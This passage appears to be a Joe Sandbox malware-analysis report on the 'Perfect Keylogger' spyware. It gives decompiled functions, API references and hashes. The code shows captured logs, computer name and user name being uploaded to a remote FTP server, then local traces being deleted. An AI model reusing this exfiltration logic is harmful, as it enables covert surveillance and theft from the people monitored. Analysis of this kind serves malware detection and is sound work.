Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #924$#858$#3790#3811H_prolog
String ID: %02d-%02d-%02d-%02d-%02d-%02d$&+D$+$.jpg$/$Logs.zip$\th_$bpk.dat$bpkch.dat$chats.html$keystrokes.html$pk.bin$report.txt$th_$web.dat$websites.html
API String ID: 1850149866-2330608752
Opcode ID: 99f5d4af5fdab39e9dced2e2cf33b0b64344e946c006b4e51263e3909b1c0f9c
Instruction ID: 2fd924c9dfb00627db4062d1ff29b6eeb5a2703bbb20c6b90c5bcdfba0e5e0f1
Opcode Fuzzy Hash: 99f5d4af5fdab39e9dced2e2cf33b0b64344e946c006b4e51263e3909b1c0f9c
Instruction Fuzzy Hash: 4D82C171D00258EEDF21EBE4DC45BEEBFB8AF19308F54405EE50467292DB785A48CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041B588, Relevance: 96.5, APIs: 52, Strings: 3, Instructions: 289
networkstringfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041B588() {
				void* _t63;
				struct HWND__* _t64;
				void* _t78;
				void* _t92;
				int _t94;
				void* _t103;
				struct HWND__* _t143;
				char* _t144;
				signed int _t148;
				void* _t151;
				void* _t157;

				E0043E4E0(0x441574, _t157);
				_t63 =  *(_t157 + 8);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x20);
					 *(_t157 - 0x14) = _t64;
					_t143 = _t64;
				} else {
					_t143 = 0;
					 *(_t157 - 0x14) = 0;
				}
				 *(_t157 - 0x24) = 7;
				if(InternetGetConnectedState(_t157 - 0x24, 0) != 0) {
					GetDlgItemTextA(_t143, 0x469, _t157 - 0x430, 0xff);
					GetDlgItemTextA(_t143, 0x433, _t157 - 0x1ac, 0x7f);
					GetDlgItemTextA(_t143, 0x434, _t157 - 0x22c, 0x7f);
					GetDlgItemTextA(_t143, 0x435, _t157 - 0x12c, 0x103);
					 *(_t157 - 0x20) = 1;
					 *(_t157 - 0x10) = GetDlgItemInt(_t143, 0x46a, _t157 - 0x20, 0);
					if( *(_t157 - 0x20) == 0) {
						 *(_t157 - 0x10) = 0;
					}
					if( *(_t157 - 0x12c) == 0) {
						lstrcpyA(_t157 - 0x12c, "/");
					}
					_t148 = IsDlgButtonChecked(_t143, 0x421);
					_t78 = InternetOpenA("PK", 0, 0, 0, 0);
					 *(_t157 + 8) = _t78;
					if(_t78 != 0) {
						asm("sbb esi, esi");
						_t151 = InternetConnectA(_t78, _t157 - 0x430,  *(_t157 - 0x10), _t157 - 0x1ac, _t157 - 0x22c, 1,  ~_t148 & 0x08000000, 0);
						if(_t151 != 0) {
							if( *(_t157 - 0x12c) == 0 || FtpSetCurrentDirectoryA(_t151, _t157 - 0x12c) != 0) {
								lstrcpyA(_t157 - 0x330, "Perfect Keylogger Test");
								FtpCreateDirectoryA(_t151, _t157 - 0x330);
								if( *(_t157 - 0x12c) != 0 &&  *((char*)(_t157 + lstrlenA(_t157 - 0x12c) - 0x12d)) != 0x2f) {
									lstrcatA(_t157 - 0x12c, "/");
								}
								lstrcatA(_t157 - 0x12c, _t157 - 0x330);
								if(FtpSetCurrentDirectoryA(_t151, _t157 - 0x12c) != 0) {
									_t144 = "readme.txt";
									_push(_t144);
									_push(0x4558c8);
									_push(_t157 - 0x18);
									L0043DE20();
									 *(_t157 - 4) = 0;
									E00429029(_t157 - 0x1c, 0xe04d);
									 *(_t157 - 4) = 1;
									_t92 = CreateFileA( *(_t157 - 0x18), 0x40000000, 0, 0, 2, 0x80, 0);
									 *(_t157 - 0x10) = _t92;
									if(_t92 != 0xffffffff) {
										_t94 = WriteFile( *(_t157 - 0x10),  *(_t157 - 0x1c),  *( *(_t157 - 0x1c) - 8), _t157 - 0x28, 0);
										_push( *(_t157 - 0x10));
										if(_t94 != 0) {
											CloseHandle();
											E0042AAFA( *(_t157 - 0x1c));
											if(FtpPutFileA(_t151,  *(_t157 - 0x18), _t144, 2, 0) != 0) {
												InternetCloseHandle(_t151);
												InternetCloseHandle( *(_t157 + 8));
												DeleteFileA( *(_t157 - 0x18));
												_push(1);
												_pop(0);
												EnableWindow(GetDlgItem( *(_t157 - 0x14), 0x468), InternetCloseHandle);
												_push(0xffffffff);
												_push(0x40);
												_push(0xe04c);
												L0043E2CA();
											} else {
												_push(0xffffffff);
												_push(0x30);
												_push(0xe042);
												L0043E2CA();
												EnableWindow(GetDlgItem( *(_t157 - 0x14), 0x468), 1);
												goto L23;
											}
										} else {
											CloseHandle();
											goto L24;
										}
									} else {
										L23:
										InternetCloseHandle(_t151);
										InternetCloseHandle( *(_t157 + 8));
										L24:
									}
									 *(_t157 - 4) = 0;
									L0043DD36();
									 *(_t157 - 4) =  *(_t157 - 4) | 0xffffffff;
									L0043DD36();
									_t103 = 0;
								} else {
									goto L20;
								}
							} else {
								L20:
								_push(0xffffffff);
								_push(0x30);
								_push(0xe041);
								L0043E2CA();
								EnableWindow(GetDlgItem(_t143, 0x468), 1);
								InternetCloseHandle(_t151);
								InternetCloseHandle( *(_t157 + 8));
								goto L21;
							}
						} else {
							_push(0xffffffff);
							_push(0x30);
							_push(0xe040);
							L0043E2CA();
							EnableWindow(GetDlgItem(_t143, 0x468), 1);
							_push( *(_t157 + 8));
							goto L11;
						}
					} else {
						_push(0xffffffff);
						_push(0x30);
						_push(0xe03f);
						L0043E2CA();
						EnableWindow(GetDlgItem(_t143, 0x468), 1);
						_push(0);
						L11:
						InternetCloseHandle();
						goto L21;
					}
				} else {
					_push(0xffffffff);
					_push(0x30);
					_push(0xe03f);
					L0043E2CA();
					EnableWindow(GetDlgItem(_t143, 0x468), 1);
					L21:
					_t103 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
				return _t103;
			}

0x0041b58d
0x0041b598
0x0041b5a2
0x0041b5ab
0x0041b5ae
0x0041b5b1
0x0041b5a4
0x0041b5a4
0x0041b5a6
0x0041b5a6
0x0041b5b8
0x0041b5c7
0x0041b609
0x0041b61a
0x0041b62b
0x0041b63f
0x0041b64c
0x0041b65c
0x0041b65f
0x0041b661
0x0041b661
0x0041b66a
0x0041b678
0x0041b678
0x0041b693
0x0041b695
0x0041b69d
0x0041b6a0
0x0041b6d3
0x0041b6fe
0x0041b702
0x0041b732
0x0041b752
0x0041b760
0x0041b76c
0x0041b791
0x0041b791
0x0041b7a5
0x0041b7bb
0x0041b7f5
0x0041b7fd
0x0041b7fe
0x0041b803
0x0041b804
0x0041b812
0x0041b815
0x0041b82e
0x0041b832
0x0041b83b
0x0041b83e
0x0041b865
0x0041b86b
0x0041b870
0x0041b87a
0x0041b883
0x0041b899
0x0041b8cc
0x0041b8d1
0x0041b8d6
0x0041b8dc
0x0041b8de
0x0041b8ef
0x0041b8f5
0x0041b8f7
0x0041b8f9
0x0041b8fe
0x0041b89b
0x0041b89b
0x0041b89d
0x0041b89f
0x0041b8a4
0x0041b8ba
0x00000000
0x0041b8ba
0x0041b872
0x0041b872
0x00000000
0x0041b872
0x0041b840
0x0041b840
0x0041b847
0x0041b84c
0x0041b84e
0x0041b84e
0x0041b906
0x0041b909
0x0041b90e
0x0041b915
0x0041b91a
0x00000000
0x00000000
0x00000000
0x0041b7bd
0x0041b7bd
0x0041b7bd
0x0041b7bf
0x0041b7c1
0x0041b7c6
0x0041b7da
0x0041b7e7
0x0041b7ec
0x00000000
0x0041b7ec
0x0041b704
0x0041b704
0x0041b706
0x0041b708
0x0041b70d
0x0041b721
0x0041b727
0x00000000
0x0041b727
0x0041b6a2
0x0041b6a2
0x0041b6a4
0x0041b6a6
0x0041b6ab
0x0041b6bf
0x0041b6c5
0x0041b6c6
0x0041b6c6
0x00000000
0x0041b6c6
0x0041b5c9
0x0041b5c9
0x0041b5cb
0x0041b5cd
0x0041b5d2
0x0041b5e6
0x0041b7ee
0x0041b7ee
0x0041b7ee
0x0041b922
0x0041b92a

APIs

__EH_prolog.LIBCMT ref: 0041B58D
InternetGetConnectedState.WININET(?,00000000), ref: 0041B5BF
#1199.MFC42(0000E03F,00000030,000000FF), ref: 0041B5D2
GetDlgItem.USER32 ref: 0041B5DF
EnableWindow.USER32(00000000), ref: 0041B5E6
GetDlgItemTextA.USER32 ref: 0041B609
GetDlgItemTextA.USER32 ref: 0041B61A
GetDlgItemTextA.USER32 ref: 0041B62B
GetDlgItemTextA.USER32 ref: 0041B63F
GetDlgItemInt.USER32(?,0000046A,?,00000000), ref: 0041B653
lstrcpyA.KERNEL32(?,00454570), ref: 0041B678
IsDlgButtonChecked.USER32(?,00000421), ref: 0041B684
InternetOpenA.WININET(004546C4,00000000,00000000,00000000,00000000), ref: 0041B695
#1199.MFC42(0000E03F,00000030,000000FF), ref: 0041B6AB
GetDlgItem.USER32 ref: 0041B6B8
EnableWindow.USER32(00000000), ref: 0041B6BF
InternetCloseHandle.WININET(?), ref: 0041B6C6
InternetConnectA.WININET(00000000,?,?,?,?,00000001,00000000,00000000), ref: 0041B6F8
#1199.MFC42(0000E040,00000030,000000FF), ref: 0041B70D
GetDlgItem.USER32 ref: 0041B71A
EnableWindow.USER32(00000000), ref: 0041B721
FtpSetCurrentDirectoryA.WININET(00000000,?), ref: 0041B73C
lstrcpyA.KERNEL32(?,Perfect Keylogger Test), ref: 0041B752
FtpCreateDirectoryA.WININET(00000000,?), ref: 0041B760
lstrlenA.KERNEL32(?), ref: 0041B775
lstrcatA.KERNEL32(?,00454570), ref: 0041B791
lstrcatA.KERNEL32(?,?), ref: 0041B7A5
FtpSetCurrentDirectoryA.WININET(00000000,?), ref: 0041B7B3
#1199.MFC42(0000E041,00000030,000000FF), ref: 0041B7C6
GetDlgItem.USER32 ref: 0041B7D3
EnableWindow.USER32(00000000), ref: 0041B7DA
InternetCloseHandle.WININET(00000000), ref: 0041B7E7
InternetCloseHandle.WININET(?), ref: 0041B7EC
#924.MFC42(?,004558C8,readme.txt), ref: 0041B804
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,004558C8,readme.txt), ref: 0041B832
InternetCloseHandle.WININET(00000000), ref: 0041B847
InternetCloseHandle.WININET(?), ref: 0041B84C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0041B865
CloseHandle.KERNEL32(?), ref: 0041B872
CloseHandle.KERNEL32(?), ref: 0041B87A
FtpPutFileA.WININET(00000000,?,readme.txt,00000002,00000000), ref: 0041B891
#1199.MFC42(0000E042,00000030,000000FF), ref: 0041B8A4
GetDlgItem.USER32 ref: 0041B8B3
EnableWindow.USER32(00000000), ref: 0041B8BA
InternetCloseHandle.WININET(00000000), ref: 0041B8CC
InternetCloseHandle.WININET(?), ref: 0041B8D1
DeleteFileA.KERNEL32(?), ref: 0041B8D6
GetDlgItem.USER32 ref: 0041B8E8
EnableWindow.USER32(00000000), ref: 0041B8EF
#1199.MFC42(0000E04C,00000040,000000FF), ref: 0041B8FE
#800.MFC42(0000E04C,00000040,000000FF), ref: 0041B909
#800.MFC42(0000E04C,00000040,000000FF), ref: 0041B915

Strings

Perfect Keylogger Test, xrefs: 0041B74C
readme.txt, xrefs: 0041B7F5, 0041B7FD, 0041B88C
/, xrefs: 0041B77B

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Item$Internet$CloseHandle$#1199EnableWindow$FileText$Directory$#800CreateCurrentlstrcatlstrcpy$#924ButtonCheckedConnectConnectedDeleteH_prologOpenStateWritelstrlen
String ID: /$Perfect Keylogger Test$readme.txt
API String ID: 135932680-3194278292
Opcode ID: 53577c25f09a491ba667c4c30a633665eeecda74440f7217b41fbe1d16934b30
Instruction ID: 02b635a109f93d23736334a9f8dc10db003247dab9decaa58358aed7eeadb697
Opcode Fuzzy Hash: 53577c25f09a491ba667c4c30a633665eeecda74440f7217b41fbe1d16934b30
Instruction Fuzzy Hash: A3A1A5B1940218BBDB109BA0DC4AFEF7B7CEF4A751F00416AF215B61D0D7784A80CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004276F1, Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211
networkfilestringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004276F1() {
				void* _t86;
				char _t95;
				char* _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;
				char _t108;
				void* _t111;
				void* _t112;
				char** _t113;
				int _t118;
				signed int _t134;
				char* _t151;
				CHAR* _t155;
				CHAR* _t158;
				void* _t160;
				CHAR* _t161;
				void* _t164;

				E0043E4E0(0x442dc4, _t164);
				_t158 =  *(_t164 + 8);
				_t151 =  &(_t158[0x369]);
				if(_t158[0x369] != 0) {
					lstrcpyA(_t164 - 0x1c0,  &(_t158[0x569]));
					if( *(_t164 - 0x1c0) == 0) {
						lstrcpyA(_t164 - 0x1c0, "/");
					}
					_t86 = InternetOpenA("PK", 0, 0, 0, 0);
					 *(_t164 - 0x10) = _t86;
					_push(0);
					if(_t86 != 0) {
						asm("sbb ecx, ecx");
						_t160 = InternetConnectA(_t86, _t151, _t158[0x106c],  &(_t158[0x469]),  &(_t158[0x4e9]), 1,  ~(_t158[0x368]) & 0x08000000, ??);
						__eflags = _t160;
						 *(_t164 - 0x20) = _t160;
						if(_t160 != 0) {
							__eflags =  *(_t164 - 0x1c0);
							if( *(_t164 - 0x1c0) == 0) {
								L11:
								 *(_t164 - 0x14) = 0x7f;
								GetComputerNameA(_t164 - 0x240, _t164 - 0x14);
								 *(_t164 - 0x14) = 0x80;
								GetUserNameA(_t164 - 0x2c0, _t164 - 0x14);
								_push(_t164 - 0x38);
								L0043E162();
								_t95 =  *0x4550cc; // 0x0
								 *((char*)(_t164 - 0xbc)) = _t95;
								_t134 = 0x1f;
								memset(_t164 - 0xbb, 0, _t134 << 2);
								asm("stosw");
								asm("stosb");
								_t99 = E0042A943(_t164 - 0xbc);
								_t155 = ".txt";
								_push(_t155);
								L0043DE26();
								 *(_t164 - 0x18) = _t99;
								_t100 = _t164 - 0xbc;
								_push(_t100);
								 *(_t164 - 4) = 0;
								L0043DE26();
								 *((intOrPtr*)(_t164 - 0x1c)) = _t100;
								_t161 = "notify.";
								_t101 = _t164 - 0x34;
								_push(_t161);
								_push(0x4558c8);
								_push(_t101);
								 *(_t164 - 4) = 1;
								L0043DE20();
								_push( *((intOrPtr*)(_t164 - 0x1c)));
								 *(_t164 - 4) = 2;
								_push(_t101);
								_t102 = _t164 - 0x30;
								_push(_t102);
								L0043E282();
								_push( *(_t164 - 0x18));
								 *(_t164 - 4) = 3;
								_push(_t102);
								_push(_t164 + 8);
								L0043E282();
								 *(_t164 - 4) = 8;
								L0043DD36();
								 *(_t164 - 4) = 7;
								L0043DD36();
								 *(_t164 - 4) = 6;
								L0043DD36();
								 *(_t164 - 4) = 5;
								L0043DD36();
								_push(_t164 - 0xbc);
								_push(_t164 - 0x2c0);
								_push(_t164 - 0x240);
								_push(_t164 - 0x38);
								_push( *(_t164 + 8));
								_t108 = E004275DF(__eflags);
								__eflags = _t108;
								if(_t108 != 0) {
									_push(_t155);
									L0043DE26();
									_t111 = _t164 - 0xbc;
									_push(_t111);
									 *(_t164 - 4) = 9;
									L0043DE26();
									_push(_t111);
									_t112 = _t164 - 0x1c;
									_push(_t161);
									_push(_t112);
									 *(_t164 - 4) = 0xa;
									L0043E168();
									_push(_t108);
									_push(_t112);
									_t113 = _t164 - 0x18;
									 *(_t164 - 4) = 0xb;
									_push(_t113);
									L0043E282();
									FtpPutFileA( *(_t164 - 0x20),  *(_t164 + 8),  *_t113, 2, 0);
									L0043DD36();
									 *(_t164 - 4) = 0xa;
									L0043DD36();
									 *(_t164 - 4) = 9;
									L0043DD36();
									 *(_t164 - 4) = 5;
									L0043DD36();
									DeleteFileA( *(_t164 + 8));
								}
								InternetCloseHandle( *(_t164 - 0x20));
								InternetCloseHandle( *(_t164 - 0x10));
								_t76 = _t164 - 4;
								 *_t76 =  *(_t164 - 4) | 0xffffffff;
								__eflags =  *_t76;
								L0043DD36();
								_push(1);
								_pop(0);
							} else {
								_t118 = FtpSetCurrentDirectoryA(_t160, _t164 - 0x1c0);
								__eflags = _t118;
								if(_t118 != 0) {
									goto L11;
								} else {
									InternetCloseHandle(_t160);
									InternetCloseHandle( *(_t164 - 0x10));
									goto L10;
								}
							}
						} else {
							_push( *(_t164 - 0x10));
							goto L4;
						}
					} else {
						L4:
						InternetCloseHandle();
						goto L10;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t164 - 0xc));
				return 0;
			}

0x004276f6
0x00427703
0x0042770f
0x00427715
0x00427729
0x00427735
0x00427743
0x00427743
0x00427752
0x0042775a
0x0042775d
0x0042775e
0x00427770
0x00427799
0x0042779b
0x0042779d
0x004277a0
0x004277a7
0x004277ad
0x004277d6
0x004277d9
0x004277e8
0x004277f1
0x00427800
0x00427809
0x0042780a
0x0042780f
0x00427816
0x0042781c
0x00427825
0x00427827
0x00427829
0x00427831
0x00427837
0x0042783c
0x00427840
0x00427845
0x00427848
0x00427851
0x00427852
0x00427855
0x0042785a
0x0042785d
0x00427862
0x00427865
0x00427866
0x0042786b
0x0042786c
0x00427870
0x00427875
0x00427878
0x0042787c
0x0042787d
0x00427880
0x00427881
0x00427886
0x00427889
0x0042788d
0x00427891
0x00427892
0x0042789a
0x0042789e
0x004278a6
0x004278aa
0x004278b2
0x004278b6
0x004278be
0x004278c2
0x004278cd
0x004278d4
0x004278db
0x004278df
0x004278e0
0x004278e3
0x004278eb
0x004278ed
0x004278f3
0x004278f7
0x004278fe
0x00427907
0x00427908
0x0042790c
0x00427911
0x00427912
0x00427915
0x00427916
0x00427917
0x0042791b
0x00427920
0x00427921
0x00427922
0x00427925
0x00427929
0x0042792a
0x0042793b
0x00427944
0x0042794c
0x00427950
0x00427958
0x0042795c
0x00427964
0x00427968
0x00427970
0x00427970
0x0042797f
0x00427984
0x00427986
0x00427986
0x00427986
0x0042798d
0x00427992
0x00427994
0x004277af
0x004277b7
0x004277bd
0x004277bf
0x00000000
0x004277c1
0x004277c8
0x004277cd
0x00000000
0x004277cd
0x004277bf
0x004277a2
0x004277a2
0x00000000
0x004277a2
0x00427760
0x00427760
0x00427760
0x00000000
0x00427760
0x0042775e
0x0042799b
0x004279a3

APIs

__EH_prolog.LIBCMT ref: 004276F6
lstrcpyA.KERNEL32(?,?), ref: 00427729
lstrcpyA.KERNEL32(?,00454570), ref: 00427743
InternetOpenA.WININET(004546C4,00000000,00000000,00000000,00000000), ref: 00427752
InternetCloseHandle.WININET(?), ref: 00427760
InternetConnectA.WININET(00000000,?,?,?,?,00000001,?,00000000), ref: 00427793
FtpSetCurrentDirectoryA.WININET(00000000,?), ref: 004277B7
InternetCloseHandle.WININET(00000000), ref: 004277C8
InternetCloseHandle.WININET(?), ref: 004277CD
GetComputerNameA.KERNEL32 ref: 004277E8
GetUserNameA.ADVAPI32(?,0000007F), ref: 00427800
#3811.MFC42(?), ref: 0042780A
#537.MFC42(.txt,?), ref: 00427840
#537.MFC42(?,.txt,?), ref: 00427855
#924.MFC42(?,004558C8,notify.,?,.txt,?), ref: 00427870
#922.MFC42(?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 00427881
#922.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 00427892
#800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 0042789E
#800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 004278AA
#800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 004278B6
#800.MFC42(?,00000000,?,?,00000000,?,?,004558C8,notify.,?,.txt,?), ref: 004278C2
#537.MFC42(.txt,.txt,?), ref: 004278F7
#537.MFC42(?,.txt,.txt,?), ref: 0042790C
#926.MFC42(?,notify.,00000000,?,.txt,.txt,?), ref: 0042791B
#922.MFC42(?,00000000,00000000,?,notify.,00000000,?,.txt,.txt,?), ref: 0042792A
FtpPutFileA.WININET(?,?,?,00000002,00000000), ref: 0042793B
#800.MFC42 ref: 00427944
#800.MFC42 ref: 00427950
#800.MFC42 ref: 0042795C
#800.MFC42 ref: 00427968
DeleteFileA.KERNEL32(?), ref: 00427970
InternetCloseHandle.WININET(?), ref: 0042797F
InternetCloseHandle.WININET(?), ref: 00427984
#800.MFC42 ref: 0042798D

Strings

.txt, xrefs: 00427837, 0042783C, 004278F3
notify., xrefs: 0042785D, 00427865, 00427915

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$Internet$CloseHandle$#537$#922$FileNamelstrcpy$#3811#924#926ComputerConnectCurrentDeleteDirectoryH_prologOpenUser
String ID: .txt$notify.
API String ID: 468773576-4159035570
Opcode ID: 6872f416e6a2f4ba84731a5947b19d21d15e962369cfee36e417a94b9d752ff8
Instruction ID: a3b7b0195e1be24dddbf1d698d64809fb25d4a444a8b1638fdecb1cb1a5429e5
Opcode Fuzzy Hash: 6872f416e6a2f4ba84731a5947b19d21d15e962369cfee36e417a94b9d752ff8
Instruction Fuzzy Hash: 18817D72D01259EEDB11EBA0DC45FEFBBBCAF19304F1045AAF505A3141DB385A48CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004247C9, Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 164
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004247C9(void* __eflags) {
				void* _t67;
				void* _t68;
				int _t77;
				int _t85;
				void* _t87;
				void* _t90;
				void* _t91;
				int _t101;
				void* _t124;
				void* _t129;
				void* _t131;
				CHAR* _t132;

				_t67 = E0043E4E0(0x44287c, _t129);
				_t132 = _t131 - 0x180;
				_push("\\*.");
				L0043DE26();
				 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
				_t124 = "dt";
				_push(_t124);
				_t68 = _t129 - 0x34;
				_push(0x4558c4);
				_push(_t68);
				L0043DE20();
				_push(_t67);
				_push(_t68);
				 *(_t129 - 4) = 1;
				_push(_t129 - 0x10);
				L0043E282();
				 *(_t129 - 4) = 4;
				L0043DD36();
				 *(_t129 - 4) = 3;
				L0043DD36();
				_push(_t129 - 0x2c);
				 *(_t129 + 8) = _t132;
				 *_t132 = ( *(_t129 + 8))[0x678] * 0x15180;
				L0043E162();
				E004249C0(_t129 + 8, _t129 + 8, _t129 - 0x3c);
				_t77 = FindFirstFileA( *(_t129 - 0x10), _t129 - 0x18c);
				 *(_t129 - 0x28) = _t77;
				if(_t77 == 0xffffffff) {
					L7:
					 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
					L0043DD36();
					 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
					return _t77;
				} else {
					goto L1;
				}
				do {
					L1:
					_t85 = sscanf(_t129 - 0x160, "%d-%d-%d_%d-%d-%d", _t129 - 0x20, _t129 - 0x18, _t129 - 0x14, _t129 - 0x1c, _t129 - 0x24, _t129 - 0x44);
					_t132 =  &(_t132[0x20]);
					if(_t85 == 6) {
						L3:
						_push(0xffffffff);
						_push(0);
						_push( *((intOrPtr*)(_t129 - 0x24)));
						_push( *((intOrPtr*)(_t129 - 0x1c)));
						_push( *((intOrPtr*)(_t129 - 0x14)));
						_push( *((intOrPtr*)(_t129 - 0x18)));
						_push( *((intOrPtr*)(_t129 - 0x20)));
						L0043E49E();
						 *(_t129 - 0x4c) = _t132;
						 *_t132 =  *(_t129 - 0x3c);
						_t87 = E004249CF(_t129 - 0x48, _t129 - 0x48);
						if(_t87 != 0) {
							_push(1);
							_push(0x5c);
							L0043E34E();
							_push(_t124);
							_t90 = _t129 - 0x38;
							_push(0x4558c4);
							_push(_t90);
							 *(_t129 - 4) = 5;
							L0043DE20();
							_push(_t87);
							_push(_t90);
							_t91 = _t129 - 0x30;
							 *(_t129 - 4) = 6;
							_push(_t91);
							L0043E282();
							 *(_t129 - 4) = 7;
							_push(_t129 - 0x160);
							_push(_t91);
							_push(_t129 + 8);
							L0043DE20();
							 *(_t129 - 4) = 0xb;
							L0043DD36();
							 *(_t129 - 4) = 0xa;
							L0043DD36();
							 *(_t129 - 4) = 9;
							L0043DD36();
							DeleteFileA( *(_t129 + 8));
							 *(_t129 - 4) = 3;
							L0043DD36();
						}
						goto L5;
					}
					_t101 = sscanf(_t129 - 0x160, "th_%d-%d-%d_%d-%d-%d", _t129 - 0x20, _t129 - 0x18, _t129 - 0x14, _t129 - 0x1c, _t129 - 0x24, _t129 - 0x44);
					_t132 =  &(_t132[0x20]);
					if(_t101 != 6) {
						goto L5;
					}
					goto L3;
					L5:
				} while (FindNextFileA( *(_t129 - 0x28), _t129 - 0x18c) != 0);
				_t77 = FindClose( *(_t129 - 0x28));
				goto L7;
			}

0x004247ce
0x004247d3
0x004247dc
0x004247e4
0x004247eb
0x004247ef
0x004247f9
0x004247fa
0x004247fd
0x004247fe
0x004247ff
0x00424804
0x00424805
0x00424809
0x0042480d
0x0042480e
0x00424816
0x0042481a
0x00424822
0x00424826
0x0042482e
0x00424831
0x00424840
0x0042484a
0x00424851
0x00424860
0x00424869
0x0042486c
0x004249a5
0x004249a5
0x004249ac
0x004249b6
0x004249bf
0x00000000
0x00000000
0x00000000
0x00424872
0x00424872
0x0042489c
0x0042489e
0x004248a4
0x004248d8
0x004248d8
0x004248da
0x004248dc
0x004248e2
0x004248e5
0x004248e8
0x004248eb
0x004248ee
0x004248f9
0x004248fc
0x00424901
0x00424908
0x0042490a
0x0042490c
0x00424911
0x00424918
0x00424919
0x0042491c
0x0042491d
0x0042491e
0x00424922
0x00424927
0x00424928
0x00424929
0x0042492c
0x00424930
0x00424931
0x0042493c
0x00424940
0x00424941
0x00424945
0x00424946
0x0042494e
0x00424952
0x0042495a
0x0042495e
0x00424966
0x0042496a
0x00424972
0x0042497b
0x0042497f
0x0042497f
0x00000000
0x00424908
0x004248ca
0x004248cc
0x004248d2
0x00000000
0x00000000
0x00000000
0x00424984
0x00424994
0x0042499f
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004247CE
#537.MFC42(\*.), ref: 004247E4
